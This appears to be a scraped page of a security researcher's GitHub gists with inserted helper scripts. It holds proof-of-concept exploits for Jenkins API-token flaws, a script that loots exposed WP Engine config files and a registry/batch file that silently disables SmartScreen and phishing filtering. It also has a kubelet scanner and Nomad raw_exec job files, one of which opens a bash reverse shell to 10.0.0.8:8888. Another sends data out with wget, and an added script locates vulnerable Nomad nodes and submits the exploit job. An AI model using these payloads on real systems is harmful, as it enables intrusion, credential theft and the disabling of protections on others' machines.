Chris Gates carnal0wnage

@carnal0wnage
carnal0wnage / gist:fad7c95492224e609ddc47fb08ac8438
Created Feb 28, 2019
Jenkins - SECURITY-180/CVE-2015-1814 PoC
POST /user/user2/descriptorByName/jenkins.security.ApiTokenProperty/changeToken HTTP/1.1
Host: 10.0.0.160
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://10.0.0.160:8080/asynchPeople/
@carnal0wnage
carnal0wnage / gist:1f316c01eaa7707c3cc6497ef04857a8
Last active Feb 28, 2019
Jenkins - SECURITY-200 / CVE-2015-5323 PoC
//from: https://gist.github.com/hayderimran7/dec6a655ba671fa5b3c3
// Run from the script console (/script) as an administrator. Before the
// SECURITY-200 fix, any admin could read another user's API token this way.
import jenkins.security.*
//j.jenkins.setSecurityRealm(j.createDummySecurityRealm());
User u = User.get("admin")
ApiTokenProperty t = u.getProperty(ApiTokenProperty.class)
def token = t.getApiToken()
//token.getClass()
println "token is $token "
wpeprivate-config.sh
#!/bin/bash
# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
# If it "no worked" (Technical Term) then you probably need to install jq!
# Usage: ./wpeprivate-config.sh https://target.example/
if [ -z "$1" ]; then
  echo "usage: $0 https://target/" >&2
  exit 1
fi
TARGET=$1
# Host part of the URL (third "/"-separated field of scheme://host/path)
TARGETDOMAIN=$(echo "$TARGET" | cut -d/ -f3)
# Pretty Colors
RESET='\033[00m'
GREEN='\033[01;32m'
gist:ff2b86ee166f504eaac362d5dece3529
REGEDIT4
; Doubles as a batch file: saved as .bat, the "; ..." lines execute (cmd treats a leading
; ";" as a delimiter), regedit silently imports this same file, and regedit ignores
; ";" lines as comments.
; @ECHO OFF
; CLS
; REGEDIT.EXE /S "%~f0"
; EXIT
; Turn off Windows SmartScreen for Explorer
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"SmartScreenEnabled"="Off"
; Turn off the Edge (legacy) phishing filter
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter]
"EnabledV9"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\AppHost]
@carnal0wnage
carnal0wnage / kubelet-find.sh
Created Jan 8, 2019
bash script that reads a file of IPs and looks for an unsecured kubelet API (port 10250)
#!/bin/bash
# Read one IP per line from kube-gke.txt and ask each kubelet's /runningpods
# endpoint without credentials; a JSON PodList back means the kubelet accepts
# anonymous requests.
while read -r a; do
  echo "$a"
  curl --insecure --max-time 5 "https://$a:10250/runningpods"
  echo ""
  echo ""
done < kube-gke.txt
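Added example, not code from the gist: the script above prints whatever the kubelet answers, so the reader still has to eyeball each response. This version classifies the reply so a scan separates a truly open kubelet (HTTP 200 with a PodList document) from one that has anonymous auth disabled (401), one that authenticates anonymous callers but denies them via authorization (403), and a closed port. Assumed: port 10250, curl available, one IP per line in the input file; the function names are mine.

```bash
#!/usr/bin/env bash
# Added example: classify kubelet responses instead of dumping them.

# classify_kubelet CODE BODY -> OPEN | AUTH_REQUIRED | FORBIDDEN | CLOSED | UNKNOWN
classify_kubelet() {
  local code="$1" body="$2"
  case "$code" in
    200)
      # A kubelet answers /runningpods with a PodList; a 200 with anything
      # else is some other service listening on the port.
      if printf '%s' "$body" | grep -Eq '"kind"[[:space:]]*:[[:space:]]*"PodList"'; then
        echo OPEN
      else
        echo UNKNOWN
      fi ;;
    401) echo AUTH_REQUIRED ;;   # anonymous auth disabled on the kubelet
    403) echo FORBIDDEN ;;       # anonymous allowed, but authz (Webhook/RBAC) denied it
    000) echo CLOSED ;;          # curl could not connect or timed out
    *)   echo UNKNOWN ;;
  esac
}

# check_kubelet IP -> "IP STATUS"
check_kubelet() {
  local ip="$1" tmp code body
  tmp=$(mktemp)
  code=$(curl -sk --max-time 5 -o "$tmp" -w '%{http_code}' \
         "https://${ip}:10250/runningpods/" 2>/dev/null) || code=000
  body=$(cat "$tmp")
  rm -f "$tmp"
  echo "$ip $(classify_kubelet "${code:-000}" "$body")"
}

# scan_file FILE -> one "IP STATUS" line per host in FILE
scan_file() {
  while IFS= read -r ip || [ -n "$ip" ]; do
    [ -z "$ip" ] && continue
    check_kubelet "$ip"
  done < "$1"
}

# Usage: ./kubelet-classify.sh kube-gke.txt
if [ $# -ge 1 ]; then
  scan_file "$1"
fi
```

Only OPEN hosts are worth the follow-up (`/pods`, `/exec`, `/run`); FORBIDDEN hosts have anonymous auth on but authorization enforced, which is the usual hardened GKE/EKS state.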
@carnal0wnage
carnal0wnage / sploit_service_revshell.hcl
Created Dec 18, 2018
hcl job file that gets a reverse shell from a nomad client node via the raw_exec driver
job "sploit_service_revshell" {
  datacenters = ["dc1"]
  group "sploit" {
    task "shello" {
      # raw_exec runs the command directly on the client host as the
      # nomad agent's user (usually root), with no isolation.
      driver = "raw_exec"
      config {
        command = "/bin/bash"
        # Connect back to the attacker's listener on 10.0.0.8:8888
        args = ["-c", "bash -i >& /dev/tcp/10.0.0.8/8888 0>&1"]
      }
    }
  }
}
@carnal0wnage
carnal0wnage / sploit_service.hcl
Created Dec 18, 2018
hcl job file that exploits nomad raw_exec
job "sploit_service" {
  datacenters = ["dc1"]
  group "sploit" {
    task "shello" {
      driver = "raw_exec"
      config {
        command = "/bin/bash"
        # Proof of execution: leak the path of nc to a listener on 10.0.0.8:8000
        # via the query string of an outbound request
        args = ["-c", "wget http://10.0.0.8:8000/?foo=`which nc`"]
      }
    }
  }
}
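Added example, not code from the gist: the two job files above only pay off on client nodes that actually have the raw_exec driver enabled (Nomad advertises it as the node attribute `driver.raw_exec` = `"1"`), so a quick enumeration over the HTTP API tells you where a registered job will run as the agent's user. Assumed: the Nomad HTTP API is reachable on port 4646 with no ACLs, curl and the `nomad` CLI are installed; the function names and the sample JSON in the test are mine.

```bash
#!/usr/bin/env bash
# Added example: enumerate Nomad client nodes that advertise raw_exec,
# then register one of the job files above against that cluster.

# node_allows_raw_exec JSON -> exit 0 if a /v1/node/<id> document shows raw_exec enabled
node_allows_raw_exec() {
  printf '%s' "$1" | grep -Eq '"driver\.raw_exec"[[:space:]]*:[[:space:]]*"1"'
}

# node_ids JSON -> node IDs from a /v1/nodes listing, one per line
node_ids() {
  # Strip whitespace so the match works on both compact and pretty-printed JSON
  printf '%s' "$1" | tr -d ' \t\n' | grep -Eo '"ID":"[0-9a-f-]+"' | cut -d'"' -f4
}

# find_raw_exec_nodes SERVER -> "<id> raw_exec|no_raw_exec" per node
find_raw_exec_nodes() {
  local base="http://$1:4646" id
  for id in $(node_ids "$(curl -s --max-time 5 "$base/v1/nodes")"); do
    if node_allows_raw_exec "$(curl -s --max-time 5 "$base/v1/node/$id")"; then
      echo "$id raw_exec"
    else
      echo "$id no_raw_exec"
    fi
  done
}

# submit_job SERVER FILE.hcl -> register the job (e.g. sploit_service.hcl) with the CLI
submit_job() {
  nomad job run -address="http://$1:4646" "$2"
}

# Usage: ./nomad-raw-exec.sh 10.0.0.5   (then: submit_job 10.0.0.5 sploit_service.hcl)
if [ $# -ge 1 ]; then
  find_raw_exec_nodes "$1"
fi
```

The attribute check is the same thing `nomad node status -verbose <id>` shows under Attributes; the API form is handier when you only have HTTP access. If every node reports `no_raw_exec`, the job will sit pending and the `exec`/`docker` drivers are the next thing to look at.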
@carnal0wnage
carnal0wnage / client2.hcl
Created Dec 18, 2018
simple client config for nomad
# Increase log verbosity
log_level = "DEBUG"
# Setup data dir
data_dir = "/tmp/client2"
# Give the agent a unique name. Defaults to hostname
name = "client2"
# Enable the client
client {
  enabled = true
  # Server to join (assumed; the gist is cut off here)
  servers = ["127.0.0.1:4647"]
}
@carnal0wnage
carnal0wnage / client1.hcl
Created Dec 18, 2018
simple client config for nomad
# Increase log verbosity
log_level = "DEBUG"
# Setup data dir
data_dir = "/tmp/client1"
# Give the agent a unique name. Defaults to hostname
name = "client1"
# Enable the client
client {
  enabled = true
  # Server to join (assumed; the gist is cut off here)
  servers = ["127.0.0.1:4647"]
}
@carnal0wnage
carnal0wnage / server.hcl
Created Dec 18, 2018
simple nomad server.hcl file
# Increase log verbosity
log_level = "DEBUG"
# Setup data dir
data_dir = "/tmp/server1"
# Enable the server
server {
  enabled = true
  # Single-server cluster, needed to elect a leader (assumed; the gist is cut off here)
  bootstrap_expect = 1
}